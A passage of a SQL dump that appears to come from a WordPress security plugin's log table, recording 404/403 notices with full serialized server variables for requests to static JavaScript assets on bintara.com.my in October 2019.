deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dfe0396a7ca8b89de12d952b2e5ce36a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:76:\"https://bintara.com.my/wp-content/themes/onepress/assets/js/bootstrap.min.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:54:\"/wp-content/themes/onepress/assets/js/bootstrap.min.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0pnqjZzpoQqaKQA3II9AAAANA\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:76:\"https://bintara.com.my/wp-content/themes/onepress/assets/js/bootstrap.min.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:54:\"/wp-content/themes/onepress/assets/js/bootstrap.min.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0pnqjZzpoQqaKQA3II9AAAANA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2543\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:76:\"https://bintara.com.my/wp-content/themes/onepress/assets/js/bootstrap.min.js\";s:10:\"SCRIPT_URL\";s:54:\"/wp-content/themes/onepress/assets/js/bootstrap.min.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0pnqjZzpoQqaKQA3II9AAAANA\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629470.5428\";s:12:\"REQUEST_TIME\";s:10:\"1571629470\";}}','notice','2019-10-21 03:44:33','2019-10-21 03:44:31',35004368,36815552,'https://bintara.com.my/wp-content/themes/onepress/assets/js/bootstrap.min.js',1,0,'219.92.69.151'),(28558,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:79:\"/wp-content/plugins/visual-form-builder/public/assets/js/jquery.validate.min.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dfe0396a7ca8b89de12d952b2e5ce36a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:101:\"https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/jquery.validate.min.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:79:\"/wp-content/plugins/visual-form-builder/public/assets/js/jquery.validate.min.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0pook4CZZwMupfWgi4pQAAAAU\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:101:\"https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/jquery.validate.min.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:79:\"/wp-content/plugins/visual-form-builder/public/assets/js/jquery.validate.min.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0pook4CZZwMupfWgi4pQAAAAU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2549\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:101:\"https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/jquery.validate.min.js\";s:10:\"SCRIPT_URL\";s:79:\"/wp-content/plugins/visual-form-builder/public/assets/js/jquery.validate.min.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0pook4CZZwMupfWgi4pQAAAAU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629474.1396\";s:12:\"REQUEST_TIME\";s:10:\"1571629474\";}}','notice','2019-10-21 03:44:36','2019-10-21 03:44:34',35003840,36804768,'https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/jquery.validate.min.js',1,0,'219.92.69.151'),(28559,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/wp-includes/js/wp-embed.min.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dfe0396a7ca8b89de12d952b2e5ce36a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:53:\"https://bintara.com.my/wp-includes/js/wp-embed.min.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:31:\"/wp-includes/js/wp-embed.min.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0pocUiXNL058AVCLtqsAAAAcU\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:53:\"https://bintara.com.my/wp-includes/js/wp-embed.min.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:31:\"/wp-includes/js/wp-embed.min.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0pocUiXNL058AVCLtqsAAAAcU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2548\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:53:\"https://bintara.com.my/wp-includes/js/wp-embed.min.js\";s:10:\"SCRIPT_URL\";s:31:\"/wp-includes/js/wp-embed.min.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0pocUiXNL058AVCLtqsAAAAcU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629474.0719\";s:12:\"REQUEST_TIME\";s:10:\"1571629474\";}}','notice','2019-10-21 03:44:36','2019-10-21 03:44:34',34977640,36774704,'https://bintara.com.my/wp-includes/js/wp-embed.min.js',1,0,'219.92.69.151'),(28560,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:75:\"/wp-content/plugins/visual-form-builder/public/assets/js/jquery.metadata.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dfe0396a7ca8b89de12d952b2e5ce36a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:97:\"https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/jquery.metadata.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:75:\"/wp-content/plugins/visual-form-builder/public/assets/js/jquery.metadata.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0pook4CZZwMupfWgi4pgAAABE\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:97:\"https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/jquery.metadata.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:75:\"/wp-content/plugins/visual-form-builder/public/assets/js/jquery.metadata.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0pook4CZZwMupfWgi4pgAAABE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2551\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:97:\"https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/jquery.metadata.js\";s:10:\"SCRIPT_URL\";s:75:\"/wp-content/plugins/visual-form-builder/public/assets/js/jquery.metadata.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0pook4CZZwMupfWgi4pgAAABE\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629474.3802\";s:12:\"REQUEST_TIME\";s:10:\"1571629474\";}}','notice','2019-10-21 03:44:36','2019-10-21 03:44:34',35005824,36813344,'https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/jquery.metadata.js',1,0,'219.92.69.151'),(28561,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:88:\"/wp-content/plugins/visual-form-builder/public/assets/js/i18n/validate/messages-en_US.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dfe0396a7ca8b89de12d952b2e5ce36a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:110:\"https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/i18n/validate/messages-en_US.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:88:\"/wp-content/plugins/visual-form-builder/public/assets/js/i18n/validate/messages-en_US.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0pouChWqi2NVtnqluBAQAAAhU\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:110:\"https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/i18n/validate/messages-en_US.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:88:\"/wp-content/plugins/visual-form-builder/public/assets/js/i18n/validate/messages-en_US.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0pouChWqi2NVtnqluBAQAAAhU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2552\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:110:\"https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/i18n/validate/messages-en_US.js\";s:10:\"SCRIPT_URL\";s:88:\"/wp-content/plugins/visual-form-builder/public/assets/js/i18n/validate/messages-en_US.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0pouChWqi2NVtnqluBAQAAAhU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629474.3892\";s:12:\"REQUEST_TIME\";s:10:\"1571629474\";}}','notice','2019-10-21 03:44:36','2019-10-21 03:44:34',35003848,36814736,'https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/i18n/validate/messages-en_US.js',1,0,'219.92.69.151'),(28562,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:78:\"/wp-content/plugins/visual-form-builder/public/assets/js/vfb-validation.min.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dfe0396a7ca8b89de12d952b2e5ce36a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:100:\"https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/vfb-validation.min.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:78:\"/wp-content/plugins/visual-form-builder/public/assets/js/vfb-validation.min.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0posUiXNL058AVCLtqsQAAAcg\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:100:\"https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/vfb-validation.min.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:78:\"/wp-content/plugins/visual-form-builder/public/assets/js/vfb-validation.min.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0posUiXNL058AVCLtqsQAAAcg\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2550\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:100:\"https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/vfb-validation.min.js\";s:10:\"SCRIPT_URL\";s:78:\"/wp-content/plugins/visual-form-builder/public/assets/js/vfb-validation.min.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0posUiXNL058AVCLtqsQAAAcg\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571629474.157\";s:12:\"REQUEST_TIME\";s:10:\"1571629474\";}}','notice','2019-10-21 03:44:36','2019-10-21 03:44:34',35002896,36804600,'https://bintara.com.my/wp-content/plugins/visual-form-builder/public/assets/js/vfb-validation.min.js',1,0,'219.92.69.151'),(28563,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:143:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 YaBrowser/18.3.1.1232 Yowser/2.5 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.85.224\";s:11:\"REMOTE_PORT\";s:5:\"46062\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa00SYk4CZZwMupfWgjAxwAAAA